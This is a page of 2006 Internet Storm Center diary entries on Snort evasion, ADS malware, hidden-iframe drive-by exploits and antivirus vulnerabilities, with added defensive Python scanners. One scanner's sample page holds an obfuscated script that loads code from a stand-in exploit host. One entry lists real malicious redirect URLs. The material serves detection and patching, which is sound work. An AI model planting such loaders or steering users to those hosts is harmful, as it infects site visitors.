Snort URL evasion vulnerability patched and version 2.6.0 available
Late breaking news flash! Snort 2.6.0 is out. According to Jennifer Steffens of Sourcefire, the new release includes:
- Tcp stream properly reassembled after failed sequence check, which may lead to possible detection evasion.
- Added configurable stream flushpoints.
- Improved rpc processing.
- Improved portscan detection.
- Improved http request processing and handling of possible evasion cases.
- Improved performance monitoring.
0 Comments
Windows Alternate Data Streams Revisited
The Bugtraq posting http://www.securityfocus.com/archive/1/435962/30/0/threaded mentions a few antivirus tools that fail to detect known malware when stored as ADSs. The Internet Storm Center has not tested any of these claims, but we have no reason to dispute them as we have seen this time and time again.
Ryan Means wrote an excellent paper (GCFW honors) that discusses Alternate Data Streams in depth, presents a number of tools to locate and manipulate ADSs, and presents an extension to Windows Explorer to directly report the presence of ADSs. You can pull it from the SANS Reading Room at: http://www.sans.org/rr/whitepapers/honors/1503.php
0 Comments
Hidden IFrame Remains Popular With Browse-By Exploit Authors
The remote server's index.html file contained JavaScript code that attempted to exploit a recent Internet Explorer vulnerability to download, install, and run a malicious executable on the website visitor's computer. The executable was recognized by about half of anti-virus tools as a spyware trojan, and was assigned names such as Downloader-ASQ, TR/Spy.Small.EE.2, Win32/SillyDL.2fy, Trojan.Spy.Win32.Small, and Downloader.
The exploit itself targeted a vulnerability that was patched in the update to Internet Explorer that Microsoft released on April 11, 2006. Microsoft Security Bulletin MS06-014 briefly describes the problem:
A remote code execution vulnerability exists in the RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker who successfully exploited this vulnerability could take complete control of an affected system.
Cumulative Security Update for Internet Explorer (912812), which was also released on April 11th, according to Microsoft Security Bulletin MS06-013, strengthens security settings for the Internet zone on Internet Explorer. These settings render the exploit ineffective even if the potential victim did not apply the 911562 patch referenced above. The cumulative update sets the following settings to Disable:
- Initialize and script ActiveX controls not marked as safe for scripting
- Access data sources across domains
Hidden IFrame elements continue to be a popular way for targeting website visitors. After breaking into a server, the attacker modifies its HTML code, using a hidden IFrame tag to retrieve exploit code from another system. Maintainers of the compromised website typically don't know that they are infecting their visitors for quite some time.
Lenny Zeltser
ISC Handler on Duty
www.zeltser.com
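Both this entry and the "E-mails with malicious links targeting Australia" entry describe the same landing-page pattern: an invisible iframe pulling in a script that branches on the browser (and on the XP SP2 token) before writing a CGI-served exploit loader. The following is an added example for triaging a fetched page for those markers; it is not code from the diary or from any vendor. The page text is constructed, and the "SV1" token it tests for is the one IE 6 adds to its User-Agent under XP SP2.

```python
"""Triage a fetched page for browse-by exploit markers: invisible iframes and
scripts that hide a browser-dependent redirect behind unescape()/fromCharCode().

Added example for the "Hidden IFrame" and "E-mails with malicious links" entries;
it is not code from the diary or any vendor. The page text is constructed; the
"SV1" token it tests for is the one IE 6 adds to its User-Agent under XP SP2.
"""
import re
from html.parser import HTMLParser


class _Collector(HTMLParser):
    """Collect every <iframe>'s attributes and the text of every inline script."""
    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self._buf = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None


def _collect(html_text):
    p = _Collector()
    p.feed(html_text)
    p.close()
    return p


def _too_small(value):
    """width/height of 0 or 1 (optionally with 'px'): a frame nobody can see."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


def hidden_iframes(html_text):
    """Return the src of each iframe sized or styled to be invisible."""
    hits = []
    for a in _collect(html_text).iframes:
        style = (a.get("style") or "").replace(" ", "").lower()
        if (_too_small(a.get("width")) or _too_small(a.get("height"))
                or "display:none" in style or "visibility:hidden" in style):
            hits.append(a.get("src") or "")
    return hits


def decode_unescape(script):
    """Expand %XX and %uXXXX sequences the way unescape() would."""
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), script)


def decode_fromcharcode(script):
    """Replace String.fromCharCode(72,105) with the string it builds."""
    return re.sub(r"String\.fromCharCode\(([\d,\s]+)\)",
                  lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()),
                  script)


OBFUSCATION_MARKERS = ("unescape(", "String.fromCharCode(", "eval(", "document.write(")


def script_findings(html_text):
    """For each inline script using an obfuscation marker, return
    (markers_seen, urls_after_decoding, checks_user_agent)."""
    findings = []
    for s in _collect(html_text).scripts:
        markers = [mk for mk in OBFUSCATION_MARKERS if mk in s]
        if not markers:
            continue
        decoded = decode_fromcharcode(decode_unescape(s))
        urls = re.findall(r"""https?://[^\s'"<>)]+""", decoded)
        ua = "navigator.userAgent" in decoded or "navigator.appVersion" in decoded
        findings.append((markers, urls, ua))
    return findings


# Constructed page: one 0x0 iframe, one ordinary banner, and a script that
# branches on the SP2 token and writes a CGI-served exploit loader.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="http://exploit.example/adv.php" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://partner.example/banner" width="468" height="60"></iframe>
<script>
var sp = navigator.userAgent.indexOf("SV1") > 0 ? 1 : 0;
document.write(unescape("%3Cscript%20src%3D%22http%3A%2F%2Fexploit.example%2Fcgi-bin%2Fgo.cgi%3Fsp%3D") + sp + unescape("%22%3E%3C%2Fscript%3E"));
</script>
</body></html>"""

if __name__ == "__main__":
    print(hidden_iframes(SAMPLE_PAGE))
    print(script_findings(SAMPLE_PAGE))
```

The decoded URLs are what you block or hunt for across proxy logs; the decoders only handle the two encodings the diary mentions, and a page that layers eval() over its own decoder needs a real JavaScript engine rather than more regular expressions.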
0 Comments
Non-standard Incident Prediction
For example, consider what we witnessed last year following the Katrina and Rita hurricanes that struck the southern coast of the USA. Within 24 hours of landfall, the Internet Storm Center observed a dramatic increase in fraudulent web sites aimed at good-hearted people wanting to donate to charities or relief efforts. We can predict with fairly high certainty that the same thing is going to happen again this year. We are monitoring DNS registrations and have seen several new names appear in the last few weeks with the strings "alberto", "beryl", "donation", or "hurricane" in them. (Alberto and Beryl are the first two names on the list for 2006.) Are they all legitimate? Well, let's see what happens as soon as the first storm forms and makes landfall.
In fact, one of our observant readers (thanks, George!) wrote us to say, "I work in a government research lab with a very diverse user population, including many soccer fans. The last World Cup led to a malware spike. I expect another spike this year, but with a potential for more sophisticated attacks." So George is keeping an eye out for a potential rise in malware attacks, basing his prediction on the fact that during the World Cup many fraudsters and pranksters will likely launch specially crafted emails and set up bogus web sites designed to lure in sports fans around the world.
It's important to recognize that a large percentage of today's Internet attacks are oriented on fraud and criminal activity, and that the criminals will use any event or circumstance to "hack layer eight" as I like to say when I teach SANS Security Essentials. (Layer eight is the "carbon layer" that sits on top of layer seven, application.)
So what are you doing to protect your layer eight from future incidents? Do you have early warning and detection devices in place? Are you educating your users and arming them to defend themselves and your networks against con-jobs aimed directly at them? Do you have not just good, but GREAT, organizational policy in place? Remember, the first step in incident handling is Preparation, and the time to start preparing is now.
Marcus H. Sachs
Director, SANS Internet Storm Center
News From Microsoft
Thanks, David, for bringing this to our attention.
Firefox and Thunderbird 1.5.0.4 released
---------------------------
Jim Clausing, jac --at-- isc dot sans dot org
Something new on Telnet?
Checking on DShield, something is odd there too...
My question is, are you observing something different on your IDS/FW logs on this port?
-----------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno && isc. sans. org)
Invision Board being exploited
Now, when you visit it, it will try to push a .wmf exploit to you.
PLEASE, DO NOT CLICK ON THE FOLLOWING LINKS!
The iframes on that page were redirecting to HTTP : // traffweb1.biz/dl/adv771.php and HTTP : // 2-extreme.biz/traff.php?adv=54 .
Those websites were in turn redirecting to HTTP : // 85.255.116.234/11.htm and HTTP : // 85.255.116.234/25.htm .
Which would try to push the .WMF exploit to you...
Fortunately, all AV vendors at Virustotal recognize the exploit, and at least McAfee and Symantec will trigger an alert when you are visiting this forum page.
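Both this diary and the MS06-013 note above describe the same pattern: a compromised page carrying a hidden or zero-sized iframe that pulls content from another host. The following is an added example (not code from the ISC diary or from any forum software) of how a site maintainer can scan their own HTML for that pattern. The HTML and the hostnames in it are constructed; `suspicious_iframes` flags any iframe that is hidden by style or sized 1x1 or smaller and whose `src` points off the site.

```python
"""Added example: flag hidden/tiny iframes that load content from another host.
The sample HTML and hostnames below are constructed (.invalid TLD), not real sites."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Constructed page: one legitimate widget iframe and three that match the
# hidden-iframe pattern described in the diary.
SAMPLE_HTML = """<html><body>
<h1>Forum</h1>
<iframe src="/widgets/poll.html" width="300" height="200"></iframe>
<iframe src="http://example.invalid/dl/adv.php" width="0" height="0"></iframe>
<iframe src="http://other.invalid/traff.php" style="display:none; visibility:hidden"></iframe>
<IFRAME SRC="//cdn.example.invalid/x.html" width=1 height=1 frameborder=0></IFRAME>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag (case-insensitive)."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # HTMLParser gives value None for bare attributes such as `hidden`
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(value):
    """Parse the leading integer of a width/height value ('0', '1px', ' 300')."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def is_hidden(attrs):
    """True if the frame is invisible by CSS or effectively invisible by size."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    return any(d is not None and d <= 1 for d in (w, h))


def is_offsite(src, site_host):
    """True if src names a host other than the site's own; relative URLs are on-site."""
    host = urlparse(src).hostname  # None for relative paths; handles //host/... too
    return host is not None and host.lower() != site_host.lower()


def suspicious_iframes(html, site_host):
    """Return the src of every iframe that is both hidden and off-site."""
    parser = IframeCollector()
    parser.feed(html)
    return [
        f["src"] for f in parser.iframes
        if "src" in f and is_hidden(f) and is_offsite(f["src"], site_host)
    ]


if __name__ == "__main__":
    for src in suspicious_iframes(SAMPLE_HTML, "forum.example.invalid"):
        print("hidden off-site iframe:", src)
```

Run this against a saved copy of a page you own (or a crawl of it) with your own hostname as `site_host`; a non-empty result is a strong hint that the page has been modified, which is exactly what the compromised forum maintainers did not notice.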
---------------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno /&&/ isc. sans. org )
F-Secure web console buffer overflow
Patch availability:
| Product | Versions | Hotfix ID | Download |
| --- | --- | --- | --- |
| F-Secure Anti-Virus for Microsoft Exchange | 6.40 | Apply hotfix for F-Secure Anti-Virus for Microsoft Exchange 6.40 | ftp://ftp.f-secure.com/support/hotfix/fsav-mse/fsavmse640-05.zip |
| F-Secure Internet Gatekeeper | 6.50 | Upgrade to F-Secure Internet Gatekeeper 6.60, or apply hotfix for F-Secure Internet Gatekeeper 6.50 | ftp://ftp.f-secure.com/support/hotfix/fsig/fsigk650-01.zip |
| F-Secure Internet Gatekeeper | 6.42, 6.41, 6.40 | Upgrade to F-Secure Internet Gatekeeper 6.60 | (none) |
---------------------------------
Jim Clausing, jclausing /at\ isc dot sans dot org
Snort bypass vulnerability
http://www.snort.org/pub-bin/snortnews.cgi#431
Demarc just released a vulnerability alert on Snort. The vulnerability leads to evasion of URI content rules. When a carriage return is added to the end of a URL (before HTTP protocol declaration), Snort detection can be evaded. According to the alert, this vulnerability will affect thousands of detection rules in the standard rule base. No need to panic at the moment though, as the folks at Sourcefire have fixed this in version 2.6.0 and we haven't seen this kind of traffic in the wild yet. Thanks to Blake Hartstein for reporting this to us. Also, thanks to our friends at Sourcefire for info on the extent of the problem and about the upcoming patch.
Please refer to the vulnerability alert for more details,
http://www.demarc.com/support/downloads/patch_20060531
More on Symantec vulnerabilities
*ALL* versions of 10.0.x and 10.1.x of Symantec Antivirus Corporate Edition and 3.0.x and 3.1.x of Symantec Client Security seem to be vulnerable.
Symantec Antivirus Corporate Edition version 8.x and 9.x seem to be ok.
Symantec released 4 patches for each product (http://www.symantec.com/avcenter/security/Content/2006.05.25.html):
Symantec Antivirus Corporate Edition
10.1.0.394 -> 10.1.0.396 (there's a typo here on their web, it's not version 3)
10.1.0.400 -> 10.1.0.401
10.0.2.2010 -> 10.0.2.2011
10.0.2.2020 -> 10.0.2.2021
Symantec Client Security
3.1.0.394 -> 3.1.0.396
3.1.0.400 -> 3.1.0.401
3.0.2.2010 -> 3.0.2.2011
3.0.2.2020 -> 3.0.2.2021
Now, if you are running *ANY* other version that is affected, you will have to first upgrade to one of the versions that have the patch out and then install the patch. I hope this will clear the confusion.
There seem to be some mitigations to the problem though. As eEye stated, this is a remotely exploitable vulnerability. Symantec Antivirus Corporate Edition, when in managed mode, will have the service Rtvscan.exe listening on TCP port 2967. If your host-based firewall is configured to block access to this port (which effectively means you can't manage the client from the centralized server, at least not until the client connects to it), you should be OK.
On our test machine, the unmanaged installation of Symantec Antivirus Corporate Edition didn't have any listeners so it looks like it's safe, at least from a remote exploit over the network (patch in any case!).
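Two checks follow from the notes above: which hotfix (if any) applies to an installed build, and whether the host is actually exposing Rtvscan.exe on TCP 2967. This is an added example, not Symantec's or the ISC's code; the version-to-hotfix table is copied from the diary, while the netstat output and PIDs are constructed, and the branch test assumes that any 10.0.x/10.1.x (SAV CE) or 3.0.x/3.1.x (SCS) build outside the table must be upgraded to one of the listed bases before its hotfix can be applied, as the diary states.

```python
"""Added example: hotfix lookup for SAV CE / SCS builds and a check for a
listener on TCP 2967.  Netstat sample is constructed, not captured."""

# Direct hotfix pairs published by Symantec (from the diary above).
PATCHED = {
    "10.1.0.394": "10.1.0.396",
    "10.1.0.400": "10.1.0.401",
    "10.0.2.2010": "10.0.2.2011",
    "10.0.2.2020": "10.0.2.2021",
    "3.1.0.394": "3.1.0.396",
    "3.1.0.400": "3.1.0.401",
    "3.0.2.2010": "3.0.2.2011",
    "3.0.2.2020": "3.0.2.2021",
}
# Assumption from the diary: every build in these major.minor branches is affected.
AFFECTED_BRANCHES = {"10.0", "10.1", "3.0", "3.1"}


def patch_action(version):
    """Classify an installed build: ('patched'|'hotfix'|'upgrade_first'|'not_affected', detail)."""
    if version in PATCHED.values():
        return ("patched", None)
    if version in PATCHED:
        return ("hotfix", PATCHED[version])
    branch = ".".join(version.split(".")[:2])
    if branch in AFFECTED_BRANCHES:
        # No direct hotfix: upgrade to one of the hotfixable bases first.
        bases = sorted(v for v in PATCHED if v.startswith(branch + "."))
        return ("upgrade_first", bases)
    return ("not_affected", None)  # e.g. 8.x / 9.x, reported OK above


# Constructed `netstat -ano`-style output for a managed client.
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       876
  TCP    0.0.0.0:2967           0.0.0.0:0              LISTENING       1720
  TCP    192.168.1.10:2967      192.168.1.5:4123       ESTABLISHED     1720
  UDP    0.0.0.0:38293          *:*                                    1720
"""


def rtvscan_listeners(netstat_output, port=2967):
    """Return (local_address, pid) for every TCP socket LISTENING on `port`."""
    hits = []
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0].upper() != "TCP":
            continue
        _proto, local, _remote, state = fields[:4]
        pid = fields[4] if len(fields) > 4 else None
        # rsplit copes with IPv6 forms such as [::]:2967
        if state.upper() == "LISTENING" and local.rsplit(":", 1)[-1] == str(port):
            hits.append((local, pid))
    return hits


if __name__ == "__main__":
    for v in ("10.1.0.394", "10.0.1.1000", "9.0.5.1000"):
        print(v, "->", patch_action(v))
    print("listeners on 2967:", rtvscan_listeners(NETSTAT_SAMPLE))
```

Feed `rtvscan_listeners` the real output of `netstat -ano` on a managed client; if it returns a listener and the host firewall does not block 2967, the machine is reachable by the eEye-described attack until patched.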
If we get more information we'll update the diary. Thanks to Gary for help with this.
UPDATE
Symantec finally posted a nice web page with details on what you have to do depending on the version you're running, at http://service1.symantec.com/SUPPORT/ent-security.nsf/docid/2006052609181248.